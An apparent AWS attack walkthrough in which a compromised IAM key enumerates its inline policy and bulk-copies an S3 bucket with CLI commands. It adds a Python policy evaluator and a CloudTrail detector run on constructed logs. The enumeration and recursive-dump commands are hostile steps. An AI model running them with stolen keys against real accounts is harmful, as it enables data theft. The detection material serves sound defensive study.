Compromised IAM Access Keys Leading to S3 Data Breach
Start with Compromised IAM Access Keys
- An attacker obtains a valid IAM access key pair (access key ID and secret access key) and configures the AWS CLI to use it. aws sts get-caller-identity confirms that the key is still active and returns the caller's ARN, which supplies the [userName] used in the following steps.
Enumerate Inline Policies
- List the inline policies attached to the compromised user:
aws iam list-user-policies --user-name [userName]
- Output: a custom inline policy named S3_Access is identified:
{
"PolicyNames": ["S3_Access"]
}
- Inline policies are only part of the picture: managed policies attached to the user are listed separately with aws iam list-attached-user-policies --user-name [userName], and permissions inherited through groups are not shown by either call.
Retrieve Details of the Inline Policy
- Retrieve the document of the S3_Access inline policy:
aws iam get-user-policy --user-name [userName] --policy-name S3_Access
- Output: the policy grants every S3 action (s3:*) on the objects inside one bucket:
{
"PolicyDocument": {
"Statement": [
{
"Effect": "Allow",
"Action": "s3:*",
"Resource": "arn:aws:s3:::sensitive-data-bucket/*"
}
]
}
}
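Why the Resource scope of that statement matters, as an added worked example (this is not code from the original page): a simplified evaluator for the S3_Access document retrieved above, used to check which S3 calls the compromised key is actually authorized for. The object key "customers.csv" and the second policy variant with a bucket-level ListBucket statement are assumptions made for the example; the evaluator handles Allow/Deny and IAM wildcards only, not Condition, NotAction, NotResource, resource policies or SCPs.

```python
import fnmatch

# The inline policy document retrieved on the page (S3_Access), as shown there.
S3_ACCESS_POLICY = {
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*",
         "Resource": "arn:aws:s3:::sensitive-data-bucket/*"}
    ]
}

# Assumed variant (not on the page) with a second statement on the bucket ARN itself.
# A recursive download needs this, because s3:ListBucket is authorized against the
# bucket ARN, which the object pattern "bucket/*" does not match.
S3_ACCESS_WITH_LIST = {
    "Statement": S3_ACCESS_POLICY["Statement"] + [
        {"Effect": "Allow", "Action": "s3:ListBucket",
         "Resource": "arn:aws:s3:::sensitive-data-bucket"}
    ]
}


def _as_list(value):
    """IAM accepts a string or a list for Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern: str, value: str, case_insensitive: bool) -> bool:
    """IAM wildcard match: '*' matches any run of characters, '?' exactly one.
    Action names are case-insensitive; S3 ARNs are case-sensitive."""
    if case_insensitive:
        pattern, value = pattern.lower(), value.lower()
    return fnmatch.fnmatchcase(value, pattern)


def is_allowed(policy: dict, action: str, resource: str) -> bool:
    """Simplified identity-policy evaluation: an explicit Deny wins over any Allow,
    and the default is deny unless some statement matches both action and resource."""
    allowed = False
    for stmt in policy["Statement"]:
        action_hit = any(_matches(p, action, True) for p in _as_list(stmt.get("Action")))
        resource_hit = any(_matches(p, resource, False) for p in _as_list(stmt.get("Resource")))
        if not (action_hit and resource_hit):
            continue
        if stmt["Effect"] == "Deny":
            return False
        allowed = True
    return allowed


def s3_capabilities(policy: dict, bucket: str, sample_key: str = "customers.csv") -> dict:
    """What the compromised key can do against `bucket` under `policy`.
    `sample_key` is an assumed object name used only to build an object ARN."""
    bucket_arn = f"arn:aws:s3:::{bucket}"
    object_arn = f"{bucket_arn}/{sample_key}"
    return {
        "list_bucket": is_allowed(policy, "s3:ListBucket", bucket_arn),      # bucket-level
        "get_object": is_allowed(policy, "s3:GetObject", object_arn),        # object-level
        "put_object": is_allowed(policy, "s3:PutObject", object_arn),        # object-level
        "delete_bucket": is_allowed(policy, "s3:DeleteBucket", bucket_arn),  # bucket-level
    }


if __name__ == "__main__":
    for name, pol in (("S3_Access as retrieved", S3_ACCESS_POLICY),
                      ("with bucket-level ListBucket", S3_ACCESS_WITH_LIST)):
        print(name, s3_capabilities(pol, "sensitive-data-bucket"))
```

With the policy exactly as retrieved, get_object and put_object are allowed but list_bucket and delete_bucket are not, so the key can read or overwrite any object whose key is known but cannot enumerate the bucket; the assumed variant with a bucket-level statement is what turns that into a full recursive dump.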
Dump the Contents of the S3 Bucket
- Enumerate and download the bucket's contents:
aws s3 cp s3://sensitive-data-bucket ./local-directory --recursive
- Result: the attacker exfiltrates the sensitive data to a local directory.
- Caveat: the recursive copy lists the bucket before downloading, and s3:ListBucket is authorized against the bucket ARN (arn:aws:s3:::sensitive-data-bucket), which the S3_Access policy does not name. With that policy exactly as shown, the listing step fails with AccessDenied and the attacker can only fetch objects whose keys are already known; the dump works as described once a statement also covers the bucket ARN. The resulting ListObjects and GetObject calls are recorded in CloudTrail only if the trail logs S3 data events; the IAM calls from the previous steps are management events and are logged by default.
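The CloudTrail footprint of the whole chain, as an added example that is not part of the original page: ListUserPolicies and GetUserPolicy from iam.amazonaws.com, followed within minutes by ListObjects and GetObject data events against the bucket from the same access key. The records below are constructed to mirror the page's steps (the key IDs, IP addresses, object keys, user name and timestamps are assumptions); the detector reports each access key that enumerates its own IAM permissions and then reads S3 objects inside a time window, and does not report a key that only reads S3 as part of its normal work.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# IAM calls a key holder makes to learn what the key can do (the page's enumeration steps).
IAM_SELF_ENUM = {"ListUserPolicies", "GetUserPolicy", "ListAttachedUserPolicies", "GetCallerIdentity"}
# S3 data-plane reads that make up the dump. These are CloudTrail data events and only
# appear in the trail if S3 data-event logging is enabled.
S3_READS = {"ListObjects", "GetObject"}

# Constructed CloudTrail records (not real logs), trimmed to the fields used below.
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "iam.amazonaws.com", "eventName": "ListUserPolicies",
     "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot", "accessKeyId": "AKIAEXAMPLE0000COMPR"},
     "requestParameters": {"userName": "deploy-bot"}},
    {"eventTime": "2024-05-01T10:00:05Z", "eventSource": "iam.amazonaws.com", "eventName": "GetUserPolicy",
     "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot", "accessKeyId": "AKIAEXAMPLE0000COMPR"},
     "requestParameters": {"userName": "deploy-bot", "policyName": "S3_Access"}},
    {"eventTime": "2024-05-01T10:01:00Z", "eventSource": "s3.amazonaws.com", "eventName": "ListObjects",
     "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot", "accessKeyId": "AKIAEXAMPLE0000COMPR"},
     "requestParameters": {"bucketName": "sensitive-data-bucket"}},
    {"eventTime": "2024-05-01T10:01:10Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot", "accessKeyId": "AKIAEXAMPLE0000COMPR"},
     "requestParameters": {"bucketName": "sensitive-data-bucket", "key": "customers.csv"}},
    {"eventTime": "2024-05-01T10:01:11Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot", "accessKeyId": "AKIAEXAMPLE0000COMPR"},
     "requestParameters": {"bucketName": "sensitive-data-bucket", "key": "payroll.xlsx"}},
    # Benign: a different key doing its normal job from the office range, with no enumeration.
    {"eventTime": "2024-05-01T09:00:00Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "sourceIPAddress": "198.51.100.10",
     "userIdentity": {"type": "IAMUser", "userName": "ci-runner", "accessKeyId": "AKIAEXAMPLE0000BENIG"},
     "requestParameters": {"bucketName": "build-artifacts", "key": "app-1.2.3.tgz"}},
]


def _ts(event: dict) -> datetime:
    """CloudTrail eventTime is ISO 8601 with a trailing Z."""
    return datetime.fromisoformat(event["eventTime"].replace("Z", "+00:00"))


def find_enum_then_dump(events, window=timedelta(minutes=30), trusted_ips=frozenset()):
    """One finding per access key that enumerates its own IAM permissions and then reads
    S3 objects within `window` of the first enumeration call. Keys that only read S3 or
    only enumerate are not reported."""
    by_key = defaultdict(list)
    for ev in events:
        key = ev.get("userIdentity", {}).get("accessKeyId")
        if key:
            by_key[key].append(ev)

    findings = []
    for key, evs in by_key.items():
        evs.sort(key=_ts)
        enum = [ev for ev in evs if ev["eventName"] in IAM_SELF_ENUM]
        if not enum:
            continue
        start = _ts(enum[0])
        reads = [ev for ev in evs
                 if ev["eventName"] in S3_READS and start <= _ts(ev) <= start + window]
        if not reads:
            continue
        buckets = sorted({ev.get("requestParameters", {}).get("bucketName", "?") for ev in reads})
        ips = sorted({ev["sourceIPAddress"] for ev in enum + reads})
        findings.append({
            "accessKeyId": key,
            "userName": evs[0]["userIdentity"].get("userName"),
            "buckets": buckets,
            "objects_read": sum(1 for ev in reads if ev["eventName"] == "GetObject"),
            "source_ips": ips,
            "untrusted_source": any(ip not in trusted_ips for ip in ips),
        })
    return findings


if __name__ == "__main__":
    for finding in find_enum_then_dump(SAMPLE_EVENTS, trusted_ips=frozenset({"198.51.100.10"})):
        print(finding)
```

On the sample records only the deploy-bot key is reported, with both GetObject calls against sensitive-data-bucket from an untrusted address; the ci-runner key never enumerates its permissions and is left alone. The enumeration-then-read ordering is what separates this from ordinary workload traffic, which is why the detector keys on the sequence rather than on GetObject volume alone.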